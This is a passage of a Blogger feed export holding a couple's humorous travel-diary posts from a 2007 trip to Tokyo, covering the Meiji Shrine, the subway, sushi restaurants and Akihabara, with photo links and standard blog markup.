/&gt;Groupie: &lt;a 
href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202061119074338" target="_blank"&gt; http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202061119074338&lt;/a&gt;&lt;br /&gt;-----------------&lt;br /&gt;After that, we headed to the Meiji Shrine, a few blocks from where we were.&lt;br /&gt;The Meiji temple was built in 1920 and later rebuilt after the Second World War (note that the war with the United States was not only Hiroshima and Nagasaki; almost the entire Japanese territory was bombed, and with it much of the cultural heritage).&lt;br /&gt;This temple was built in honor of Emperor Meiji, who was in charge of "Westernizing Japan" (or opening the doors to the West, to put it more clearly). For example, one of the laws he enacted was to prohibit carrying katanas (Japanese swords) in the streets.&lt;br /&gt;Although it is not one of the best temples (many better ones await us in Kyoto), it is very pretty and interesting to visit.&lt;br /&gt;-----------------&lt;br /&gt; The wooden structures announce the nearness of the temple: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202099773780082" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202099773780082 &lt;/a&gt;&lt;br /&gt;Sake barrels? 
at the entrance: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202151313387746" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202151313387746&lt;/a&gt;&lt;br /&gt;Before entering, purify yourself:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202194263060818" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202194263060818&lt;/a&gt;&lt;br /&gt;                              &lt;div id="1fok" class="ArwC7c ckChnd"&gt;&lt;wbr&gt;              &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202202852995442" target="_blank"&gt; http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202202852995442&lt;/a&gt;&lt;br /&gt;The temple:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202284457374322" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202284457374322 &lt;/a&gt;&lt;br /&gt;                 &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202293047308930" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202293047308930&lt;/a&gt;&lt;br /&gt;To make wishes, you have to part with some yen:  &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202262982537762" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202262982537762&lt;/a&gt;&lt;br /&gt;Wishes: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202250097635826" target="_blank"&gt; http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202250097635826&lt;/a&gt;&lt;br /&gt;Inside: &lt;a href="http://picasaweb.google.com/nicowow/29112007Tokyo/photo#5138202275867439698" 
target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/29112007Tokyo/photo&lt;wbr&gt;#5138202275867439698 &lt;/a&gt;&lt;br /&gt;-----------------&lt;br /&gt;  That's all for today; tomorrow we probably won't visit much, since a conference day awaits us!&lt;br /&gt;&lt;br /&gt;See you soon&lt;br /&gt;Cari and Nico&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-398499754651353982?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/398499754651353982/comments/default' title='Enviar comentarios'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=398499754651353982' title='0 comentarios'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/398499754651353982'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/398499754651353982'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/cronicas-nipponas-5to-capitulo-en-busca.html' title='Cronicas Nipponas - 5to Capitulo - &quot;En busca del pescado crudo&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8331846494823173483</id><published>2007-11-28T12:22:00.000-08:00</published><updated>2007-11-28T12:24:32.368-08:00</updated><title type='text'>Nipponese Chronicles - Chapter 4</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) 
{}" href="http://lh3.google.com/nicowow/R03KPx0urLI/AAAAAAAAA90/iy5GyFpNbAI/DSC_3212.JPG?imgmax=640"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh3.google.com/nicowow/R03KPx0urLI/AAAAAAAAA90/iy5GyFpNbAI/DSC_3212.JPG?imgmax=640" alt="" border="0" /&gt;&lt;/a&gt;Konichiwa desde el imperio del sol,&lt;br /&gt;Uno de los problemas mas importantes que afronta nuestro equipo es la comunicacion verbal y gestual con los nativos. Si bien, problemas de comunicacion en el lenguaje eran esperados pese al entrenamiento previo en la lengua anglosajona por excelencia, lo que llamo la atencion de nuestros aventureros fue el lenguaje gestual.&lt;br /&gt;Como se imaginaran, ni "Si" ni "Yes" funcionan para afirmar, tampoco se puede asentir, conociendo ya que ese gesto es reservado para la famosa reverencia japonesas. (Hasta el dia de la fecha, el equipo no ha ubicado el gesto adecuado, hay una suerte de paso clasico de danza moderna, en el cual uno pone las manos sobre la cabeza, pero no esta verificado en la practica).&lt;br /&gt;Como ocurre con "Si", la palabra "No" tampoco funciona en japones -Se dice Lee-, y como ya a esta altura se habran imaginado, mover la cabeza de lado a lado tampoco funciona. Lo que si funciona, es hacer una cruz con los dedos (o los brazos, si quiere ponerse mas enfasis) e inclinarla unos 45 grados, como lo indica la siguiente fotografia donde un japones nos advierte amablemente que no lo fotografiemos. 
(The sign, made with the fingers and in the context of a restaurant, also serves to ask for the dreaded bill after savoring some delicacy.)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;For you readers who insisted on seeing photographs of the expedition members, we leave you one:&lt;br /&gt;&lt;a href="http://picasaweb.google.com/nicowow/28112007/photo#5137985075076312098" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/28112007/photo&lt;wbr&gt;#5137985075076312098 &lt;/a&gt; where instead of Wally, the game is called "Find Cari".&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R03KNB0urCI/AAAAAAAAA8s/iTeEPhWmB5w/DSC_3200.JPG?imgmax=640"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R03KNB0urCI/AAAAAAAAA8s/iTeEPhWmB5w/DSC_3200.JPG?imgmax=640" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;See you soon!&lt;br /&gt;&lt;br /&gt;Nico &amp;amp; Cari&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8331846494823173483?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8331846494823173483/comments/default' title='Post comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8331846494823173483' title='0 comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8331846494823173483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8331846494823173483'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/cronicas-nipponas-4to-capitulo.html' 
title='Nippon Chronicles - 4th Chapter'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-8054787671969413179</id><published>2007-11-28T07:39:00.000-08:00</published><updated>2007-11-28T07:48:39.108-08:00</updated><title type='text'>Nippon Chronicles - 3rd Chapter - "Cari Goes to the Central Bank"</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.google.com/nicowow/R0zyTh0uqFI/AAAAAAAAA00/EBjbkCfBWJY/DSC_3113.JPG?imgmax=576"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh5.google.com/nicowow/R0zyTh0uqFI/AAAAAAAAA00/EBjbkCfBWJY/DSC_3113.JPG?imgmax=576" alt="" border="0" /&gt;&lt;/a&gt;Konichiwa dear followers,&lt;br /&gt;Today's chapter is called "Cari Goes to the Central Bank". Don't be alarmed, it's not the daily routine but the journey the female member of the team made to get to the BOJ (Bank of Japan, Japan's central bank), where she had a student, sorry, cultural exchange with a member of the institution.&lt;br /&gt;&lt;br /&gt;Let's start at the beginning: the subway network is fairly simple.&lt;br /&gt;&lt;br /&gt;Tokyo has roughly 35 subway lines and a few more train lines, which, as we said in chapter 2, differ little from the subways. 
But, although it may seem statistically impossible, getting around on Japan's subways is quite simple, and to that end the forensic research team devoted this morning to investigating it; below we present the case study.&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0zyTR0uqEI/AAAAAAAAA0s/2-WDdBuRX_E/DSC_3112.JPG?imgmax=512"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0zyTR0uqEI/AAAAAAAAA0s/2-WDdBuRX_E/DSC_3112.JPG?imgmax=512" alt="" border="0" /&gt;&lt;/a&gt; The goal of the expedition was to arrive, safe and sound, at Mitsukoshimae station, two blocks from the already renowned Bank of Japan where Cari would have an arduous day of work. To do so, we first ventured to the Shibuya subway station and chose, among the various possible subway lines, the "Ginza Line". The system is very simple and works with millimetric precision: once you know the line and the station, you first have to buy the ticket; if you don't have one of the magic rechargeable cards (SUICAs), you have to go to the vending machine and get a ticket. The price depends on the station you're going to, so it's advisable to ask at a booth for the right fare.&lt;br /&gt;Ticket in hand, the system is very simple. 
There are two possibilities on a given line, going one way or the other (bearing in mind that the trains have a linear structure), so you have to find out which famous station lies in the direction you want to go; in this case Ueno was the most famous, so we chose the subways that 'go toward Ueno'.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.google.com/nicowow/R0zyUh0uqII/AAAAAAAAA1M/jeylLtSSX8A/DSC_3116.JPG?imgmax=640"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://lh5.google.com/nicowow/R0zyUh0uqII/AAAAAAAAA1M/jeylLtSSX8A/DSC_3116.JPG?imgmax=640" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;The rest is easy: simply get on the subway and check exactly which station to get off at.&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0zyVR0uqLI/AAAAAAAAA1k/29Oq3N88ZJE/DSC_3120.JPG?imgmax=576"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0zyVR0uqLI/AAAAAAAAA1k/29Oq3N88ZJE/DSC_3120.JPG?imgmax=576" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh3.google.com/nicowow/R0zybB0uqaI/AAAAAAAAA3g/BzCA7GZGgJQ/DSC_3139.JPG?imgmax=512"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh3.google.com/nicowow/R0zybB0uqaI/AAAAAAAAA3g/BzCA7GZGgJQ/DSC_3139.JPG?imgmax=512" alt="" border="0" /&gt;&lt;/a&gt;The system is precise and effective; forget about the roadblocks in Carapachay. 
As the case shows, the excursion was a success, both going and coming back.&lt;br /&gt;If you still have doubts, this helpful raccoon will explain a few details to you:&lt;br /&gt;&lt;br /&gt;While Cari represented our beloved Republic K, the rest of the expedition ventured into the central district of Nihombashi -famous for its bridge, and for being our favorite Japanese restaurant back home in Capital Federal- and the district of Shinjuku (one of the many neighborhoods full of lights, colors and bars of modern Tokyo).&lt;br /&gt;&lt;br /&gt;One of the activities on which the group of ethnologists places the most emphasis is Japan's famous culinary arts; this will be a recurring theme across the chapters of this chronicle. In this edition we'll focus on two different modalities: the food-ticket vending machine and the display-window restaurant.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0zyhR0uqrI/AAAAAAAAA5s/VXwSw3P7rF8/DSC_3169.JPG?imgmax=512"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0zyhR0uqrI/AAAAAAAAA5s/VXwSw3P7rF8/DSC_3169.JPG?imgmax=512" alt="" border="0" /&gt;&lt;/a&gt;The &lt;span style="font-weight: bold;"&gt;food-ticket vending machine&lt;/span&gt;, a somewhat long but descriptive name, refers to restaurants that have something like a vending machine at the entrance where you choose the food you want and pay, and it hands you a ticket. Once that simple process is done, you enter the premises and hand it to the cook with no further interaction, and once it's cooked he hands you the desired dish. 
Recommended for Japanese in a hurry or Gaijin (foreigners) tired of dealing with translation problems.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0zylR0uq2I/AAAAAAAAA7I/GEQq6NFoPLg/DSC_3182.JPG?imgmax=576"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0zylR0uq2I/AAAAAAAAA7I/GEQq6NFoPLg/DSC_3182.JPG?imgmax=576" alt="" border="0" /&gt;&lt;/a&gt;The &lt;span style="font-weight: bold;"&gt;display-window restaurants&lt;/span&gt; are those culinary temples that have a showcase at the entrance with most of the menu's dishes modeled in plastic, so that ignorant foreigners, or Japanese who like to 'devour with their eyes', can use it as an interesting incentive when making their choice.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;That's all for today's edition; the team is meticulously documenting Japanese stereotypes and promises an in-depth investigation of the subject in a future edition.&lt;br /&gt;&lt;br /&gt;Until next time&lt;br /&gt;Cari &amp;amp; Nico&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-8054787671969413179?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/8054787671969413179/comments/default' title='Post comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=8054787671969413179' title='0 comments'/><link rel='edit' type='application/atom+xml' 
href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8054787671969413179'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/8054787671969413179'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/cronicas-nipponas-3er-capitulo-cari-va.html' title='Nippon Chronicles - 3rd Chapter - &quot;Cari Goes to the Central Bank&quot;'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-213514874599847512</id><published>2007-11-27T08:16:00.000-08:00</published><updated>2007-11-27T08:32:55.542-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='akihabara'/><category scheme='http://www.blogger.com/atom/ns#' term='flushing'/><category scheme='http://www.blogger.com/atom/ns#' term='japon'/><category scheme='http://www.blogger.com/atom/ns#' term='shibuya'/><category scheme='http://www.blogger.com/atom/ns#' term='sushi'/><category scheme='http://www.blogger.com/atom/ns#' term='niguiri'/><title type='text'>Tokyo Chronicles - Part 2</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0wA5R0upbI/AAAAAAAAAuo/GfGvU3U0hC4/DSC_3049.JPG?imgmax=640"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0wA5R0upbI/AAAAAAAAAuo/GfGvU3U0hC4/DSC_3049.JPG?imgmax=640" alt="" border="0" /&gt;&lt;/a&gt;&lt;span style="font-weight: bold;"&gt;H&lt;/span&gt;ere we are again from our humble corner, to meticulously document our various experiences in Tokyo.&lt;br /&gt;In the morning, the group of adventurers went deep into the very bowels of the Shibuya district, a neighborhood known for being frequented by young people -like those writing to you- and for having a multitude of malls and shops -a great temptation for the female member of the expedition-.&lt;br /&gt;As you can see in the following photo, the journey was documented with photographic and film material, mainly some crucial moments such as the well-known Shibuya crossing and a few street corners.&lt;br /&gt;&lt;br /&gt;The temperature was quite low, so, taking advantage of the neighborhood's qualities, it was decided to buy the equipment needed for the journey. This experience, besides being fruitful, left a few reflections.&lt;br /&gt;&lt;br /&gt;The Japanese, despite what the world may believe, are very modern and elegant in their dress. Just as with the meticulous care in the presentation of their food, Japanese dress is very well tended, which is accompanied by a huge textile market, one that, as the team decided, puts it at number one in the ranking (not Madrid, not NY).&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh5.google.com/nicowow/R0wBBh0upxI/AAAAAAAAAxc/O3DlM5raqHI/DSC_3083.JPG?imgmax=640"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer; width: 320px;" src="http://lh5.google.com/nicowow/R0wBBh0upxI/AAAAAAAAAxc/O3DlM5raqHI/DSC_3083.JPG?imgmax=640" alt="" border="0" /&gt;&lt;/a&gt;It's interesting how the Japanese put all their technology to use in the various commercial areas, as can be seen for example in the following photo, where the screen shows in real time how a person looks with different types of makeup -for reasons of mental health, we avoided photographing the male members of the group-.&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Finally, one of the team's goals was achieved and the famous real quality of Japanese sushi was confirmed. The dishes consisted of all kinds of Nigiri (raw fish on top of a ball of rice), Miso-shiru (miso soup with mushrooms) and green tea. All this for the modest sum of 1500 yen.&lt;br /&gt;The day went on, but the heroes of this story were struck down by jet lag, so they needed an hour's rest -a nap that only the female member of the group took- before continuing the expedition to the famous Akihabara district.&lt;br /&gt;&lt;br /&gt;No, dear public, it's not a clothing store but the famous electronics district in the suburbs of Tokyo. To get there, the team had to use all its mathematical skills to decipher the complex map of subways and trains -an old legend says that if you add up the number of letters, subtract the number of stations and divide by 3.14, the result is 666, but it's left to the reader whether to believe its veracity-.&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://lh4.google.com/nicowow/R0wA_R0upsI/AAAAAAAAA0A/qBgebLoWojY/DSC_3073.JPG?imgmax=512"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer; width: 320px;" src="http://lh4.google.com/nicowow/R0wA_R0upsI/AAAAAAAAA0A/qBgebLoWojY/DSC_3073.JPG?imgmax=512" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Let me pause to detail a bit how they work. Tokyo's trains and subways aren't much like trains, nor much like subways. That is, the trains run above and below ground, and the subways do the same. They connect with each other, despite being different.&lt;br /&gt;The team opted to take the Yamamoto Line train belonging to the JR company, bound for Akihabara station. 
The stretch took about 30 minutes, which at times felt suffocating due to the demographic excess inside.&lt;br /&gt;&lt;br /&gt;Finally, we arrived at our destination. It's really very hard to cover all of Akihabara; it has little streets and alleys, and some shops bring to mind deepest Once, though perhaps a bit neater. Every kind of electronic device, cable, nut, tool, Japanese comic magazine, music, etc. could be found in the various scattered shops, although honestly, in the short time we were there, we got to see little.&lt;br /&gt;&lt;br /&gt;We simply headed to Yodobashi Camera, an 8-story complex of monstrous size -forgive the adjective-, where each floor corresponded to a specific type of item (DVD/CD, audio-video, photo cameras, etc.). Although there is a lot of variety, amid the sheer mass of products it's hard to find anything.&lt;br /&gt;So the team left somewhat frustrated, unable to get what it longed for.&lt;br /&gt;&lt;br /&gt;Tired from the tour, the team opted for a light meal, so it headed to the top floor of Yodobashi in search of raw fish, and found it. The style of the place probably has some specific name, but we don't know it; basically it works like this: there's an electric conveyor belt -like an escalator- that runs around the whole place, you sit at the bar and pick whichever plate you want, which usually holds two nigiri of the same kind. Each plate has a different color, and at the end of the meal the colors of the plates determine how much you pay.&lt;br /&gt;Very moderate, the team ate only 7 plates. Our neighbor on the next stool outdid us, and he was just one person.&lt;br /&gt;&lt;br /&gt;The neighbor to the right ordered a dish of which we couldn't get photographic material, but we can only tell you that it moved. 
Basically it consisted of a tray with a tiny little plate holding little sardines, and on the same tray there was a medium-sized fish skewered on a brochette stick, which Cari warned had opened its mouth, and after watching it for a while, it could be observed that the fish really was still alive -as far as the team knows, the fish had not been eaten, but it was only a matter of time; what was obviously confirmed was that that fish really was fresh-.&lt;br /&gt;&lt;br /&gt;Finally, the team made a fleeting stop at the bathroom, where it noticed that the toilet had a peculiar button called "Flush Buttom" -in another edition we'll expand on Japanese bathrooms and their incredible qualities-. The "Flush Buttom", as was confirmed, makes the toilet produce a flushing noise to cover any embarrassing noise one might make during that awkward moment in a public bathroom.&lt;br /&gt;&lt;br /&gt;That's all for today; I leave you with some photos of the day at the following address: &lt;a href="http://picasaweb.google.com/nicowow/Tokyo27112007" target="_blank"&gt;http://picasaweb.google.com&lt;wbr&gt;/nicowow/Tokyo27112007&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;We love you!&lt;br /&gt;&lt;br /&gt;Nico &amp;amp; Cari&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-213514874599847512?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/213514874599847512/comments/default' title='Post comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=213514874599847512' title='0 comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/213514874599847512'/><link 
rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/213514874599847512'/><link rel='alternate' type='text/html' href='http://eticanicomana.blogspot.com/2007/11/henos-aqui-nuevamente-desde-nuestro.html' title='Tokyo Chronicles - Part 2'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-385326485135551026</id><published>2007-11-26T21:45:00.000-08:00</published><updated>2007-11-26T21:53:48.217-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='tokyo'/><category scheme='http://www.blogger.com/atom/ns#' term='shibuya'/><category scheme='http://www.blogger.com/atom/ns#' term='yakitori'/><category scheme='http://www.blogger.com/atom/ns#' term='messi'/><title type='text'>Kore wa nan des ka?</title><content type='html'>Hello!&lt;br /&gt;&lt;br /&gt;We finally arrived after 30 arduous hours of planes -10 to Washington, 6 hours of waiting, 13 and change to Tokyo- no longer knowing how to settle into the seat.  But here we are, 6:29 AM -6:29 PM Argentina time-, in the deepest of our insomnias -not true, Cari can sleep and keep on sleeping, Nico can't-. &lt;br /&gt;Well, enough nonsense, let's get to the point.  We are in the very center of Tokyo, in the city of Shibuya (famous for the intersection with illuminated signs that can be seen in movies like "Lost in Translation"), and it's really very pretty.&lt;br /&gt;  Thanks to our great skills as connoisseurs of exotic cultures, we managed to decipher how to take the "Narita Express", a bullet train, which brought us in exactly 1 hour to this beautiful city. 
&lt;br /&gt;  On the way out, already in the dead of night, the lights of the screens and the J-Pop -a kind of electronic sound reminiscent of the old days of the Gameboy and the Family Game- lit our way to our beloved quarters.&lt;br /&gt;  At night, we went out in search of our real destination -food-. After using all our intellect to figure out which of the thousands of tiny little restaurant doors served sushi, we ended up in one... that, obviously, didn't serve sushi.&lt;br /&gt;  But driven by that strange itch that curiosity generates, we stayed. The waiter was more than familiar, and although a great deal of effort was put in by both sides, it was almost impossible to strike up a conversation -an important card to play in international relations is always to name the reference point: Maradona, or, believe it or not, Lionel Messi is the new addition for geographically locating our country on the globe-.&lt;br /&gt;  The restaurant was tiny and its specialty was 'grilled' food -yes, the Argentines ended up eating asado-, but with the peculiarity that they brought you a small Zen grill with charcoal shaped like ice cubes, on which you cooked your own food and then seasoned it with soy sauce, miso paste -a.k.a. sweetish little paste- and wasabi -spicy little radish-. 
&lt;br /&gt;  Our choice for the grill, recommended in part by our new waiter-friend, was a very tasty fish called Hakko, Unagi -a kind of eel, which came skewered on a 'yakitori' brochette stick- and another kind of eel -or the same one, who knows- called Anago -which was the tastiest thing we tried, a delight-.&lt;br /&gt; For the detractors of Nico's beard, our new waiter-friend told us it suited him.&lt;br /&gt;&lt;br /&gt; Once out of the restaurant, we took a walk around the neighborhood, passed through multiple alleys and little streets, and learned about the latest trends in Japanese fashion -tiny little shorts at 10 degrees ambient temperature for women, and wild haircuts for men-.&lt;br /&gt;  Here we reach the end of this first part; the internet is a bit slow because we're piggybacking off a neighbor -the hotel has internet, but wired. Believe it or not, in the country where the toilet heats the seat automatically, the internet is over a network cable-.&lt;br /&gt;&lt;br /&gt;We love you lots, and see you soon&lt;br /&gt;&lt;br /&gt;Domo Arigato Gozaimasu,&lt;br /&gt;Cari-San and Nico-San&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6583006355693901620-385326485135551026?l=eticanicomana.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://eticanicomana.blogspot.com/feeds/385326485135551026/comments/default' title='Post comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6583006355693901620&amp;postID=385326485135551026' title='1 comment'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/385326485135551026'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6583006355693901620/posts/default/385326485135551026'/><link rel='alternate' 
type='text/html' href='http://eticanicomana.blogspot.com/2007/11/kore-wa-nan-des-ka.html' title='Kore wa nan des ka?'/><author><name>Nico Waisman</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://3.bp.blogspot.com/_aUReV5sSeqk/SK8WvUJkBdI/AAAAAAAADD4/PGa-HWl7rJw/S220/DSC00333.JPG'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6583006355693901620.post-6382222411191458760</id><published>2007-11-24T03:13:00.000-08:00</published><updated>2007-11-24T03:46:26.862-08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='partida'/><category scheme='http://www.blogger.com/atom/ns#' term='exilio'/><category scheme='http://www.blogger.com/atom/ns#' term='tokyo'/><title type='text'>On Exile</title><content type='html'>&lt;div style="text-align: justify;"&gt;&lt;span style="font-family:georgia;"&gt;Buenos Aires,&lt;br /&gt; For 15 days, Cari and I are leaving for Tokyo. Gambatte!&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div style="text-align: justify;"&gt;&lt;span style="font-family: georgia;"&gt;"The deep suffering he experienced was that of all prisoners and all exiles, the suffering of living with a useless memory. That very past they thought about continually had only the taste of nostalgia. They would have liked to be 